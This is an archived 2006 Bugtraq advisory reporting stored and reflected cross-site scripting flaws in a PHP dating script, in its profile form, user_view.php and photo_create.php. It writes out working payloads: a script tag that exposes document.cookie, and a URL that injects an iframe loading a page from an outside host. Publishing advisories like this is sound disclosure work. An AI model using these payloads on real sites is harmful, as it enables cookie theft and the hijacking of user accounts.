[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Dating biz@ dating script v1.0 - XSS
From: luny () youfucktard ! com
Date: 2006-06-22 23:13:20
Message-ID: 20060622231320.4328.qmail () securityfocus ! com
[Download RAW message or body]
Custom dating biz@ dating script v1.0
Homepage:
http://www.e-cbd.biz/php_dating_script.html
Affected files:
*Profiles
user_view.php
photo_create.php
---------------------------------
The edit profile form can be spoofed and a user can enter any data he wishes and it \
will update his profile. The "Choose an opening like and Pople say you look like" \
input boxes are the only ones that when entered, will be reviewed by the sites admin. \
Max char limit stored in the db for each profile box appears to be 36 chars EXCEPT \
for the input box "Special Cases". This box is where I will
display our XSS example with the cookie info.
PoC:
<script>alert(document.cookie)</script>
Screenshots:
http://www.youfucktard.com/xsp/ebizdate1.jpg
http://www.youfucktard.com/xsp/ebizdate2.jpg
http://www.youfucktard.com/xsp/ebizdate3.jpg
-----------------------------------
XSS vuln via user_view.php:
http://www.example.com/user_view.php?u=<iframe%20src=http://ha.ckers.org/scriptlet.html>
----------------------------------
XSS vuln on photo_create.php.
Max char limit stored in db is only 32, but data isn't sanatized.
---------------------------------
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic